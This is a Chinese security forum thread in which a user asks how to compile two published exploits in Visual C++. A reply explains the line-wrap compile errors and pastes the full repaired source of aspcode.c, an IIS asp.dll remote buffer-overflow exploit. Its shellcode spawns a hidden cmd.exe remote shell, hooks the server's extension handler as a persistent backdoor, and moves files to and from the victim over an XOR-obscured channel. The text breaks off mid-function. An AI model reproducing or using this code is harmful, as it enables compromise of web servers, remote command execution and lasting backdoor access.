-
-
[求助]用VC编译yuange的 aspcode.c 和 exover.c
-
2009-10-6 11:35 6597
-
请各路大侠指点一下
如何用Microsoft Visual C ++顺利编译出如下两个程序:
--------------------------------------------
1. 利用结构异常绕过溢出保护攻击
网址:
http://www.nsfocus.net/index.php?act=magazine&do=view&mid=682
2. aspcode.c
网址:
http://www.packetstormsecurity.org/0209-exploits/aspcode.c
---------------------------------------------
[培训]《安卓高级研修班(网课)》月薪三万计划,掌 握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法
赞赏
|
|
|---|---|
|
|
对于兄弟的第二个代码aspcode.c,到该网址上L复制出代码后,粘贴到VC6编辑器中,直接编译会报告一大堆错误,仔细看一下,都是一些源代码字符串不符合规定造成的,基本上都是
变量名 或 常量名 或 注释 被不适当的的回车换行符给截断了,造成VC误解出错, 只要将它们调整到一行上即可编译通过。 注:直接在IE地址栏打开网址 http://www.packetstormsecurity.org/0209-exploits/aspcode.c 看到的是不换行的“通篇”代码,很难看的,这时可以点击鼠标右键查看源文件,看到的代码就是整齐的了。 一个小技巧。 附调整后的代码供参考: /* aspcode.c ver1.0 iis4.0、iis5.0、iis5.1 asp.dll overflow program copy by yuange <yuange@nsfocus.com> 2002.4.24 */ #include <windows.h> #include <winsock.h> #include <stdio.h> #include <httpext.h> #pragma comment(lib,"ws2_32") //#define RETEIPADDR eipwin2000 #define FNENDLONG 0x08 #define NOPCODE 0x90 #define NOPLONG 0x50 #define BUFFSIZE 0x20000 #define PATHLONG 0x12 #define RETEIPADDRESS 0x468 #define SHELLBUFFSIZE 0x800 #define SHELLFNNUMS 14 #define DATABASE 0x61 #define DATAXORCODE 0x55 #define LOCKBIGNUM 19999999 #define LOCKBIGNUM2 13579139 #define MCBSIZE 0x8 #define MEMSIZE 0xb200 #define SHELLPORT 0x1f90 //0x1f90=8080 #define WEBPORT 80 void shellcodefnlock(); void shellcodefnlock2(); void shellcodefn(char *ecb); void shellcodefn2(char *ecb); void cleanchkesp(char *fnadd,char *shellbuff,char *chkespadd ,int len); void iisput(int fd,char *str); void iisget(int fd,char *str); void iiscmd(int fd,char *str); void iisreset(); void iisdie(); void iishelp(); int newrecv(int fd,char *buff,int size,int flag); int newsend(int fd,char *buff,int size,int flag); int xordatabegin; int lockintvar1,lockintvar2; char lockcharvar; int main(int argc, char **argv) { char *server; char *str="LoadLibraryA""\x0""CreatePipe""\x0" "CreateProcessA""\x0""CloseHandle""\x0" "PeekNamedPipe""\x0" "ReadFile""\x0""WriteFile""\x0" "CreateFileA""\x0" "GetFileSize""\x0" "GetLastError""\x0" "Sleep""\x0" "\x09""ntdll.dll""\x0""RtlEnterCriticalSection""\x0" "\x09""asp.dll""\x0""HttpExtensionProc""\x0" "\x09""msvcrt.dll""\x0""memcpy""\x0""\x0" "cmd.exe""\x0""\x0d\x0a""exit""\x0d\x0a""\x0" "XORDATA""\x0""xordatareset""\x0" "strend"; // char buff0[]="TRACK / HTTP/1.1\nHOST:"; char buff1[]="GET /"; char buff2[]="default.asp"; char *buff2add; char buff3[]="?!!ko "; char buff4[]=" HTTP/1.1 \nHOST:"; char buff5[]="\nContent-Type: application/x-www-form-urlencoded"; char buff51[]="\nTransfer-Encoding:chunked"; char buff6[]="\nContent-length: 2147506431\r\n\r\n"; // 0x80000000+MEMSIZE-1 char buff61[]="\nContent-length: 4294967295\r\n\r\n"; // 0xffffffff char buff7[]= "\x10\x00\x01\x02\x03\x04\x05\x06\x1c\xf0\xfd\x7f\x20\x21\x00\x01"; char buff11[]= "\x02\x00\x01\x02\x03\x04\x05\x06\x22\x22\x00\x01\x22\x22\x00\x01"; char buff10[]="\x20\x21\x00\x01\x20\x21\x00\x01"; char buff9[]= "\x20\x21\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"; char buff8[]= "\x81\xec\xff\xe4\x90\x90\x90\x90\x90\x90\x90\x90\x90"; /* char buff10[]="\x10\x00\x01\x02\x03\x04\x05\x06\x1d\x21\x00\x01\xec\x21\x00\x01"; char buff11[]="\x10\x00\x01\x02\x03\x04\x05\x06\x20\x21\x00\x01\x01\x21\x00\x01"; char buff12[]="\x10\x00\x01\x02\x03\x04\x05\x06\x21\x21\x00\x01\x00\x21\x00\x01"; char buff13[]="\x10\x00\x01\x02\x03\x04\x05\x06\x22\x21\x00\x01\xff\x21\x00\x01"; char buff14[]="\x10\x00\x01\x02\x03\x04\x05\x06\x23\x21\x00\x01\xe4\x21\x00\x01"; char buff15[]="\x10\x00\x01\x02\x03\x04\x05\x06\x24\x21\x00\x01\x90\x21\x00\x01"; */ char *fnendstr="\x90\x90\x90\x90\x90\x90\x90\x90\x90"; char SRLF[]="\x0d\x0a\x00\x00"; char *eipexceptwin2000add; char eipexceptwin20002[]="\x80\x70\x9f\x74"; // push ebx ; ret address char eipexceptwin2000cn[]="\x73\x67\xfa\x7F"; // push ebx ; ret address char eipexceptwin2000[]="\x80\x70\x97\x74"; // char eipexceptwin2000[]="\xb3\x9d\xfa\x77"; // \x01\x78"; // call ebx address char eipexceptwin2000msvcrt[]="\xD3\xCB\x01\x78"; char eipexceptwin2000sp2[]="\x02\xbc\x01\x78"; // char eipexceptwin2000[]="\x0B\x08\x5A\x68"; // char eipexceptwin2000[]="\x32\x8d\x9f\x74"; char eipexceptwinnt[] ="\x82\x01\xfc\x7F"; // push esi ; ret address // char eipexceptwinnt[] ="\x2e\x01\x01\x78"; // call esi address // char eipexcept2[]="\xd0\xae\xdc\x77"; // char buff[BUFFSIZE]; char recvbuff[BUFFSIZE]; char shellcodebuff[BUFFSIZE]; char shellcodebuff2[BUFFSIZE]; struct sockaddr_in s_in2,s_in3; struct hostent *he; char *shellcodefnadd,*chkespadd; unsigned int sendpacketlong,buff2long,shelladd,packlong; int i,j,k,l,strheadlong; unsigned char temp; int fd; u_short port,port1,shellcodeport; SOCKET d_ip; WSADATA wsaData; int offset=0; int OVERADD=RETEIPADDRESS; int result; fprintf(stderr,"\n IIS ASP.DLL OVERFLOW PROGRAM 2.0 ."); fprintf(stderr,"\n copy by yuange 2002.4.24."); fprintf(stderr,"\n welcome to my homepage http://yuange.yeah.net ."); fprintf(stderr,"\n welcome to http://www.nsfocus.com ."); fprintf(stderr,"\n usage: %s <server> [aspfile] [webport] [winxp] \n", argv[0]); buff2add=buff2; if(argc <2){ fprintf(stderr,"\n please enter the web server:"); gets(recvbuff); for(i=0;i<strlen(recvbuff);++i){ if(recvbuff[i]!=' ') break; } server=recvbuff; if(i<strlen(recvbuff)) server+=i; fprintf(stderr,"\n please enter the .asp filename:"); gets(shellcodebuff); for(i=0;i<strlen(shellcodebuff);++i){ if(shellcodebuff[i]!=' ') break; } buff2add=shellcodebuff+i; printf("\n .asp file name:%s\n",buff2add); } eipexceptwin2000add=eipexceptwin2000; // printf("\n argc%d argv%s",argc,argv[5]); if(argc>5){ if(strcmp(argv[5],"cn")==0) { eipexceptwin2000add=eipexceptwin2000cn; printf("\n For the cn system.\n"); } if(strcmp(argv[5],"sp0")==0) { eipexceptwin2000add=eipexceptwin20002; printf("\n For the sp0 system.\n"); } if(strcmp(argv[5],"msvcrt")==0) { eipexceptwin2000add=eipexceptwin2000msvcrt; printf("\n Use msvcrt.dll JMP to shell.\n"); } if(strcmp(argv[5],"sp2")==0) { eipexceptwin2000add=eipexceptwin2000sp2; printf("\n Use sp2 msvcrt.dll JMP to shell.\n"); } } result= WSAStartup(MAKEWORD(1, 1), &wsaData); if (result != 0) { fprintf(stderr, "Your computer was not connected " "to the Internet at the time that " "this program was launched, or you " "do not have a 32-bit " "connection to the Internet."); exit(1); } /* if(argc>4){ offset=atoi(argv[4]); } // OVERADD+=offset; // packlong=0x10000-offset+0x8; if(offset<-0x20||offset>0x20){ fprintf(stderr,"\n offset error !offset -32 --- +32 ."); gets(buff); exit(1); } */ if(argc <2){ // WSACleanup( ); // exit(1); } else server = argv[1]; for(i=0;i<strlen(server);++i){ if(server[i]!=' ') break; } if(i<strlen(server)) server+=i; for(i=0;i+3<strlen(server);++i){ if(server[i]==':'){ if(server[i+1]=='\\'||server[i+1]=='/'){ if(server[i+2]=='\\'||server[i+2]=='/'){ server+=i; server+=3; break; } } } } for(i=1;i<=strlen(server);++i){ if(server[i-1]=='\\'||server[i-1]=='/') server[i-1]=0; } d_ip = inet_addr(server); if(d_ip==-1){ he = gethostbyname(server); if(!he) { WSACleanup( ); printf("\n Can't get the ip of %s !\n",server); gets(buff); exit(1); } else memcpy(&d_ip, he->h_addr, 4); } if(argc>3) port=atoi(argv[3]); else port=WEBPORT; if(port==0) port=WEBPORT; fd = socket(AF_INET, SOCK_STREAM,0); i=8000; setsockopt(fd,SOL_SOCKET,SO_RCVTIMEO,(const char *) &i,sizeof(i)); s_in3.sin_family = AF_INET; s_in3.sin_port = htons(port); s_in3.sin_addr.s_addr = d_ip; printf("\n nuke ip: %s port %d",inet_ntoa(s_in3.sin_addr),htons(s_in3.sin_port)); if(connect(fd, (struct sockaddr *)&s_in3, sizeof(struct sockaddr_in))!=0) { closesocket(fd); WSACleanup( ); fprintf(stderr,"\n connect err."); gets(buff); exit(1); } _asm{ mov ESI,ESP cmp ESI,ESP } _chkesp(); chkespadd=_chkesp; temp=*chkespadd; if(temp==0xe9) { ++chkespadd; i=*(int*)chkespadd; chkespadd+=i; chkespadd+=4; } /* shellcodefnadd=shellcodefnlock; temp=*shellcodefnadd; if(temp==0xe9) { ++shellcodefnadd; k=*(int *)shellcodefnadd; shellcodefnadd+=k; shellcodefnadd+=4; } for(k=0;k<=0x500;++k){ if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break; } */ memset(buff,NOPCODE,BUFFSIZE); /* strcpy(buff,buff0); if(argc>6) strcat(buff,argv[6]); else strcat(buff,server); strcat(buff,"\r\n\r\n"); //Proxy_Connection: Keep-Alive\r\n"); strcat(buff,buff1); */ strcpy(buff,buff1); strheadlong=strlen(buff); OVERADD+=strheadlong-1; if(argc>2) buff2add=argv[2]; for(;;++buff2add){ temp=*buff2add; if(temp!='\\'&&temp!='/') break; } // printf("\nfile:%s",buff2add); buff2long=strlen(buff2add); strcat(buff,buff2add); // fprintf(stderr,"\n offset:%d\n",offset); // offset+=strheadlong-strlen(buff1); /* for(i=0x404;i<=0x500;i+=8){ memcpy(buff+offset+i,"\x42\x42\x42\x2d",4); // 0x2d sub eax,num32 memcpy(buff+offset+i+4,eipexceptwin2000add,4); } if(argc>5){ if(strcmp(argv[5],"sp2")==0) { memcpy(buff+offset+i,"\x58",1); } } for(i=0x220;i<=0x380;i+=8){ memcpy(buff+offset+i,"\x42\x42\x42\x2d",4); // 0x2d sub eax,num32 memcpy(buff+offset+i+4,eipexceptwinnt,4); } for(i=0x580;i<=0x728;i+=8){ memcpy(buff+offset+i,"\x42\x42\x42\x2d",4); // 0x2d sub eax,num32 memcpy(buff+offset+i+4,eipexceptwinnt,4); } */ // winnt 0x2cc or 0x71c win2000 0x130 or 0x468 // memcpy(buff+offset+i+8,exceptret,strlen(exceptret)); shellcodefnadd=shellcodefnlock; temp=*shellcodefnadd; if(temp==0xe9) { ++shellcodefnadd; k=*(int *)shellcodefnadd; shellcodefnadd+=k; shellcodefnadd+=4; } for(k=0;k<=0x500;++k){ if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break; } memset(shellcodebuff2,NOPCODE,BUFFSIZE); i=0x1000; memcpy(shellcodebuff2+i+4,shellcodefnadd+k+8,0x100); shellcodefnadd=shellcodefn; temp=*shellcodefnadd; if(temp==0xe9) { ++shellcodefnadd; k=*(int *)shellcodefnadd; shellcodefnadd+=k; shellcodefnadd+=4; } for(k=0;k<=BUFFSIZE;++k){ if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break; } // k+=0x memcpy(shellcodebuff,shellcodefnadd,k); //j); cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k); for(j=0;j<0x400;++j){ if(memcmp(str+j,"strend",6)==0) break; } memcpy(shellcodebuff+k,str,j); sendpacketlong=k+j; for(k=0;k<=0x200;++k){ if(memcmp(shellcodebuff2+i+4+k,fnendstr,FNENDLONG)==0) break; } for(j=0;j<sendpacketlong;++j){ temp=shellcodebuff[j]; // temp^=DATAXORCODE; shellcodebuff2[i+4+k]=DATABASE+temp/0x10; ++k; shellcodebuff2[i+4+k]=DATABASE+temp%0x10; ++k; } j=i+k; j=j%8+3; shellcodebuff2[i+j+k]=0; // j=strlen(shellcodebuff2)%8+3; for(j=0;j<=0xe000;j+=4){ strcat(shellcodebuff2,"\x41\x41\x41\x41"); // 0x2d sub eax,num32 // strcat(shellcodebuff2,eipexceptwin2000cn); } /* strcat(shellcodebuff2,"\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x0f\x66\x83\ x6c\x24\x02\x01\x66\x81\x2c\x24\x01\x01\xff\x24\x24\xe8\xec\xff\xff\xff\ x90"); for(j=0;j<=0xb00;j+=4){ strcat(shellcodebuff2,"\x90\x90\x90\x2d"); // 0x2d sub eax,num32 } */ // printf("\nbuff:%s",buff); printf("\n shellcode long 0x%x\n",sendpacketlong); if(argc>4&&strcmp(argv[4],"apache")==0){ strcat(buff," "); } else strcat(buff,buff3); printf("\n packetlong:0x%x\n",sendpacketlong); strcat(buff,buff4); if(argc>6) strcat(buff,argv[6]); else strcat(buff,server); strcat(buff,buff5); if(argc>4&&strcmp(argv[4],"apache")==0) strcat(buff," "); else strcat(buff,shellcodebuff2); // strcat(buff,buff51); if(argc>4&&(strcmp(argv[4],"winxp")==0||strcmp(argv[4],"apache")==0)) { printf("\n for %s system\n",argv[4]); strcat(buff,buff61); } else strcat(buff,buff6); // printf("\n send buff:\n%s",buff); /* i=strlen(buff); memset(buff+i,'a',0xc000); memset(buff+i+0xc000-strlen(buff7),0,1); strcat(buff+i+0xc000-0x10-strlen(buff7),buff7); */ // strcpy(buff8,buff7); /* temp=buff7[5]; temp-=offset*0x10; buff7[5]=temp; i=*(int *)(buff7+4)+2; printf("\nSEH=0x%x\n",i); */ /* for(i=0;i<8;++i){ temp=buff7[i]; printf("%2x",temp); } */ /* for(i=0;i<0xc000/0x10;++i){ strcat(buff,buff7); } */ // printf("\nbuff=%s\n",buff); // strcat(buff,"\r\n"); // printf("\n send buff:\n%s",buff); // strcpy(buff+OVERADD+NOPLONG,shellcode); sendpacketlong=strlen(buff); // printf("buff:\n%s",buff+0x10000); /* #ifdef DEBUG _asm{ lea esp,buff add esp,OVERADD ret } #endif */ lockintvar1=LOCKBIGNUM2%LOCKBIGNUM; lockintvar2=lockintvar1; xordatabegin=0; for(i=0;i<1;++i){ j=sendpacketlong; // buff[0x2000]=0; fprintf(stderr,"\n send packet %d bytes.",j); // gets(buff); send(fd,buff,j,0); buff7[0]=MCBSIZE; j=MEMSIZE+0x10; i=0; if(argc>4&&strcmp(argv[4],"winxp")==0) { j=0x18; i=8; } for(k=0;i<0xc000;i+=0x10){ if(i>=j) { k=((i-j)/(MCBSIZE*8)); if(k<=6){ memcpy(buff7+0x8,buff10,8); buff7[0x8]=buff8[k]; buff7[0xc]=buff9[k]; } else memcpy(buff7,buff11,0x10); } memcpy(buff+i,buff7,0x10); } if(argc>4&&strcmp(argv[4],"apache")==0){ for(k=0xb000;k<=0xc000;k+=2) { memset(buff+k,0x0d,1); memset(buff+k+1,0x0a,1); } buff[0xc000]=0; // for(k=0;k<0x10;++k) send(fd,buff,0xc000,0); // printf("\nbuff:%s\n",buff); } else send(fd,buff,0xc000,0); k=0; ioctlsocket(fd, FIONBIO, &k); j=0; while(j==0){ k=newrecv(fd,recvbuff,BUFFSIZE,0); if(k>=8&&strstr(recvbuff,"XORDATA")!=0) { xordatabegin=1; fprintf(stderr,"\n ok!recv %d bytes\n",k); recvbuff[k]=0; // printf("\n recv:%s",recvbuff); // for(k-=8,j=0;k>0;k-=4,++j)printf("recvdata:0x%x\n",*(int*)(recvbuff+8+4*j)); k=-1; j=1; } if(k>0){ recvbuff[k]=0; fprintf(stderr,"\n recv:\n %s",recvbuff); } } } k=1; ioctlsocket(fd, FIONBIO, &k); // fprintf(stderr,"\n now begin: \n"); /* for(i=0;i<strlen(SRLF);++i){ SRLF[i]^=DATAXORCODE; } send(fd,SRLF,strlen(SRLF),0); send(fd,SRLF,strlen(SRLF),0); send(fd,SRLF,strlen(SRLF),0); */ k=1; l=0; while(k!=0){ if(k<0){ l=0; i=0; while(i==0){ gets(buff); if(memcmp(buff,"iish",4)==0){ iishelp(); i=2; } if(memcmp(buff,"iisput",6)==0){ iisput(fd,buff+6); i=2; } if(memcmp(buff,"iisget",6)==0){ iisget(fd,buff+6); i=2; } if(memcmp(buff,"iiscmd",6)==0){ iiscmd(fd,buff+6); i=2; } if(memcmp(buff,"iisreset",8)==0){ iisreset(fd,buff+6); i=2; } if(memcmp(buff,"iisdie",6)==0){ iisdie(fd,buff+6); i=2; } if(i==2)i=0; else i=1; } k=strlen(buff); memcpy(buff+k,SRLF,3); // send(fd,SRLF,strlen(SRLF),0); // fprintf(stderr,"%s",buff); /* for(i=0;i<k+2;++i){ lockintvar2=lockintvar2*0x100; lockintvar2=lockintvar2%LOCKBIGNUM; lockcharvar=lockintvar2%0x100; buff[i]^=lockcharvar; // DATAXORCODE; // buff[i]^=DATAXORCODE; } send(fd,buff,k+2,0); */ newsend(fd,buff,k+2,0); // send(fd,SRLF,strlen(SRLF),0); } k=newrecv(fd,buff,BUFFSIZE,0); if(xordatabegin==0&&k>=8&&strstr(buff,"XORDATA")!=0) { xordatabegin=1; k=-1; } if(k>0){ // fprintf(stderr,"recv %d bytes",k); /* if(xordatabegin==1){ for(i=0;i<k;++i){ lockintvar1=lockintvar1*0x100; lockintvar1=lockintvar1%LOCKBIGNUM; lockcharvar=lockintvar1%0x100; buff[i]^=lockcharvar; // DATAXORCODE; } } */ l=0; buff[k]=0; fprintf(stderr,"%s",buff); } else{ Sleep(20); if(l<20) k=1; ++l; } // if(k==0) break; } closesocket(fd); WSACleanup( ); fprintf(stderr,"\n the server close connect."); gets(buff); return(0); } void shellcodefnlock() { _asm{ nop nop nop nop nop nop nop nop jmp next1 getediadd: pop edi mov esp,edi and esp,0xfffff0f0 jmp next2 getshelladd: push 0x01 mov eax,edi inc eax inc eax inc eax inc eax inc eax mov edi,eax mov esi,edi // sub sp,8 xor ecx,ecx looplock: lodsb cmp al,cl jz shell sub al,DATABASE mov ah,al lodsb sub al,DATABASE shl ah,4 add al,ah // lea eax,ptr word [edx*4+al] stosb jmp looplock next1: call getediadd next2: call getshelladd shell: NOP NOP NOP NOP NOP NOP NOP NOP } } void shellcodefn(char *ecb) { char Buff[SHELLBUFFSIZE+2]; int *except[3]; FARPROC memcpyadd; FARPROC msvcrtdlladd; FARPROC HttpExtensionProcadd; FARPROC Aspdlladd; FARPROC RtlEnterCriticalSectionadd; FARPROC Ntdlladd; FARPROC Sleepadd; FARPROC GetLastErroradd; FARPROC GetFileSizeadd; FARPROC CreateFileAadd; FARPROC WriteFileadd; FARPROC ReadFileadd; FARPROC PeekNamedPipeadd; FARPROC CloseHandleadd; FARPROC CreateProcessadd; FARPROC CreatePipeadd; FARPROC procloadlib; FARPROC apifnadd[1]; FARPROC procgetadd=0; FARPROC writeclient; FARPROC readclient; HCONN ConnID; FARPROC shellcodefnadd=ecb; char *stradd,*stradd2,*dooradd; int imgbase,fnbase,i,k,l,thedoor; HANDLE libhandle; int fpt; //libwsock32; STARTUPINFO siinfo; PROCESS_INFORMATION ProcessInformation; HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2; int lBytesRead; int lockintvar1,lockintvar2; char lockcharvar; int shelllocknum; // unsigned char temp; SECURITY_ATTRIBUTES sa; _asm { jmp nextcall getstradd: pop stradd lea EDI,except mov eax,dword ptr FS:[0] mov dword ptr [edi+0x08],eax mov dword ptr FS:[0],EDI } except[0]=0xffffffff; except[1]=stradd-0x07; imgbase=0x77e00000; _asm{ call getexceptretadd } for(;imgbase<0xbffa0000,procgetadd==0;){ imgbase+=0x10000; if(imgbase==0x78000000) imgbase=0xbff00000; if(*( WORD *)imgbase=='ZM'&& *(WORD *)(imgbase+*(int *)(imgbase+0x3c))=='EP'){ fnbase=*(int *)(imgbase+*(int *)(imgbase+0x3c)+0x78)+imgbase; k=*(int *)(fnbase+0xc)+imgbase; if(*(int *)k =='NREK'&&*(int *)(k+4)=='23LE'){ libhandle=imgbase; k=imgbase+*(int *)(fnbase+0x20); for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){ if(*(int *)(imgbase+*(int *)k)=='PteG'&&*(int *)(4+imgbase+*(int *)k)=='Acor') { k=*(WORD *)(l+l+imgbase+*(int *)(fnbase+0x24)); k+=*(int *)(fnbase+0x10)-1; k=*(int *)(k+k+k+k+imgbase+*(int *)(fnbase+0x1c)); procgetadd=k+imgbase; break; } } } } } //搜索KERNEL32。DLL模块地址和API函数 GetProcAddress地址 //注意这儿处理了搜索页面不在情况。 if(procgetadd==0) goto die ; i=stradd; for(k=1;*stradd!=0;++k) { if(*stradd==0x9) libhandle=procloadlib(stradd+1); else apifnadd[k]=procgetadd(libhandle,stradd); for(;*stradd!=0;++stradd){ } ++stradd; } ++stradd; k=0x7ffdf020; *(int *)k=RtlEnterCriticalSectionadd; k=stradd; stradd=i; thedoor=0; i=0; _asm{ jmp getdoorcall getdooradd: pop dooradd; mov l,esp call getexceptretadd } if(i==0){ ++i; if(*(int *)ecb==0x90){ if(*(int *)(*(int *)(ecb+0x64))=='ok!!') { i=0; thedoor=1; } } } if(i!=0){ *(int *)(dooradd-0x0c)=HttpExtensionProcadd; *(int *)(dooradd-0x13)=shellcodefnadd; ecb=0; _asm{ call getexceptretadd } i=ecb; i&=0xfffff000; ecb=i; ecb+=0x1000; for(;i<l;++i,++ecb) { if(*(int *)ecb==0x90){ if(*(int *)(ecb+8)==(int *)ecb){ if(*(int *)*(int *)(ecb+0x64)=='ok!!') break; } } } i=0; _asm{ call getexceptretadd } i&=0xfffff000; i+=0x1000; for(;i<l;++i){ if(*(int *)i==HttpExtensionProcadd){ *(int *)i=dooradd-7; // break; } } // *(int *)(dooradd-0x0c)=HttpExtensionProcadd; } writeclient= *(int *)(ecb+0x84); readclient = *(int *)(ecb+0x88); ConnID = *(int *)(ecb+8) ; stradd=k; _asm{ lea edi,except mov eax,dword ptr [edi+0x08] mov dword ptr fs:[0],eax } if(thedoor==0){ _asm{ mov eax,0xffffffff mov dword ptr fs:[0],eax } } stradd2=stradd; stradd+=8; k=0x20; writeclient(ConnID,*(int *)(ecb+0x6c),&k,0); k=8; writeclient(ConnID,stradd+9,&k,0); // Sleepadd(100); shelllocknum=LOCKBIGNUM2; if(*(int *)*(int *)(ecb+0x64)=='ok!!'&&*(int *)(*(int *)(ecb+0x64)+4)=='notx') shelllocknum=0; // iiscmd: lockintvar1=shelllocknum%LOCKBIGNUM; lockintvar2=lockintvar1; iiscmd: /* lockintvar1=LOCKBIGNUM2%LOCKBIGNUM; lockintvar2=lockintvar1; */ sa.nLength=12; sa.lpSecurityDescriptor=0; sa.bInheritHandle=TRUE; CreatePipeadd(&hReadPipe1,&hWritePipe1,&sa,0); CreatePipeadd(&hReadPipe2,&hWritePipe2,&sa,0); // ZeroMemory(&siinfo,sizeof(siinfo)); _asm{ lea EDI,siinfo xor eax,eax mov ecx,0x11 repnz stosd } siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; siinfo.wShowWindow = SW_HIDE; siinfo.hStdInput = hReadPipe2; siinfo.hStdOutput=hWritePipe1; siinfo.hStdError =hWritePipe1; k=0; // while(k==0) // { k=CreateProcessadd(NULL,stradd2,NULL,NULL,1,0,NULL,NULL,&siinfo, &ProcessInformation); // stradd+=8; // } Sleepadd(200); // PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0); i=0; while(1) { PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0); if(lBytesRead>0) { i=0; ReadFileadd(hReadPipe1,Buff,lBytesRead,&lBytesRead,0); if(lBytesRead>0) { for(k=0;k<lBytesRead;++k){ lockintvar2=lockintvar2*0x100; lockintvar2=lockintvar2%LOCKBIGNUM; lockcharvar=lockintvar2%0x100; Buff[k]^=lockcharvar; // DATAXORCODE; // Buff[k]^=DATAXORCODE; } writeclient(ConnID,Buff,&lBytesRead,0); // HSE_IO_SYNC); // Sleepadd(20); } } else{ // Sleepadd(10); l=0; if(i<50){ l=1; ++i; k=1; lBytesRead=0; } while(l==0){ i=0; lBytesRead=SHELLBUFFSIZE; k=readclient(ConnID,Buff,&lBytesRead); for(l=0;l<lBytesRead;++l){ lockintvar1=lockintvar1*0x100; lockintvar1=lockintvar1%LOCKBIGNUM; lockcharvar=lockintvar1%0x100; Buff[l]^=lockcharvar; // DATAXORCODE; } if(k==1&&lBytesRead>=5&&Buff[0]=='i'&&Buff[1]=='i'&&Buff[2]=='s'&&Buff[3]=='c'&&Buff[4]==' '){ k=8; WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe stradd2=Buff+5; Buff[lBytesRead]=0; goto iiscmd; } if(k==1&&lBytesRead>=5&&Buff[0]=='r'&&Buff[1]=='e'&&Buff[2]=='s'&&Buff[3]=='e'&&Buff[4]=='t'){ lBytesRead=0x0c; writeclient(ConnID,stradd+0x11,&lBytesRead,0); lockintvar1=shelllocknum%LOCKBIGNUM; lockintvar2=lockintvar1; lBytesRead=0; } if(k==1&&lBytesRead>=5&&Buff[0]=='i'&&Buff[1]=='i'&&Buff[2]=='s'&&Buff[3]=='r'&&Buff[4]=='r'){ k=8; WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe *(int *)(dooradd-0x0c)=0; Sleepadd(0x7fffffff); _asm{ mov eax,0 mov esp,0 jmp eax } } if(k==1&&lBytesRead>4&&Buff[0]=='p'&&Buff[1]=='u'&&Buff[2]=='t'&&Buff[3] ==' ') { l=*(int *)(Buff+4); // WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL); fpt=CreateFileAadd(Buff+0x8,FILE_FLAG_WRITE_THROUGH+ GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0 ); k=GetLastErroradd(); i=0; while(l>0){ lBytesRead=SHELLBUFFSIZE; k=readclient(ConnID,Buff,&lBytesRead); if(k==1){ if(lBytesRead>0){ for(k=0;k<lBytesRead;++k){ lockintvar1=lockintvar1*0x100; lockintvar1=lockintvar1%LOCKBIGNUM; lockcharvar=lockintvar1%0x100; Buff[k]^=lockcharvar; // DATAXORCODE; } l-=lBytesRead; // if(fpt>0) WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL); // else Sleepadd(010); } // if(i>100) l=0; } else { Sleepadd(0100); ++i; } if(i>10000) l=0; } CloseHandleadd(fpt); l=0; } else{ if(k==1&&lBytesRead>4&&Buff[0]=='g'&&Buff[1]=='e'&&Buff[2]=='t'&&Buff[3] ==' '){ // fpt=CreateFileAadd(Buff+4,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0); fpt=CreateFileAadd(Buff+4,GENERIC_READ,FILE_SHARE_READ+FILE_SHARE_WRITE, NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0); Sleepadd(100); l=GetFileSizeadd(fpt,&k); *(int *)Buff='ezis'; //size *(int *)(Buff+4)=l; lBytesRead=8; for(i=0;i<lBytesRead;++i){ lockintvar2=lockintvar2*0x100; lockintvar2=lockintvar2%LOCKBIGNUM; lockcharvar=lockintvar2%0x100; Buff[i]^=lockcharvar; // DATAXORCODE; } writeclient(ConnID,Buff,&lBytesRead,0); // HSE_IO_SYNC); // Sleepadd(100); i=0; while(l>0){ k=SHELLBUFFSIZE; ReadFileadd(fpt,Buff,k,&k,0); if(k>0){ for(i=0;i<k;++i){ lockintvar2=lockintvar2*0x100; lockintvar2=lockintvar2%LOCKBIGNUM ; lockcharvar=lockintvar2%0x100; Buff[i]^=lockcharvar; // DATAXORCODE; } i=0; l-=k; writeclient(ConnID,Buff,&k,0); // HSE_IO_SYNC); // Sleepadd(100); // k=readclient(ConnID,Buff,&lBytesRead); } else ++i; if(i>100) l=0; } CloseHandleadd(fpt); l=0; } else l=1; } } if(k!=1){ k=8; WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe k=GetLastErroradd(); while(k==0x2746){ if(thedoor==1) goto asmreturn; Sleepadd(0x7fffffff); //僵死 } } else{ WriteFileadd(hWritePipe2,Buff,lBytesRead,&lBytesRead,0); // Sleepadd(1000); } } } die: goto die ; _asm{ asmreturn: mov eax,HSE_STATUS_SUCCESS leave ret 04 door: push eax mov eax,[esp+0x08] mov eax,[eax+0x64] mov eax,[eax] cmp eax,'ok!!' jnz jmpold pop eax push 0x12345678 //dooradd-0x13 ret jmpold: pop eax push 0x12345678 //dooradd-0xc ret //1 jmp door //2 getdoorcall: call getdooradd //5 getexceptretadd: pop eax push eax mov edi,dword ptr [stradd] mov dword ptr [edi-0x0e],eax ret errprogram: mov eax,dword ptr [esp+0x0c] add eax,0xb8 mov dword ptr [eax],0x11223344 //stradd-0xe xor eax,eax //2 ret //1 execptprogram: jmp errprogram //2 bytes stradd-7 nextcall: call getstradd //5 bytes NOP NOP NOP NOP NOP NOP NOP NOP NOP } } void cleanchkesp(char 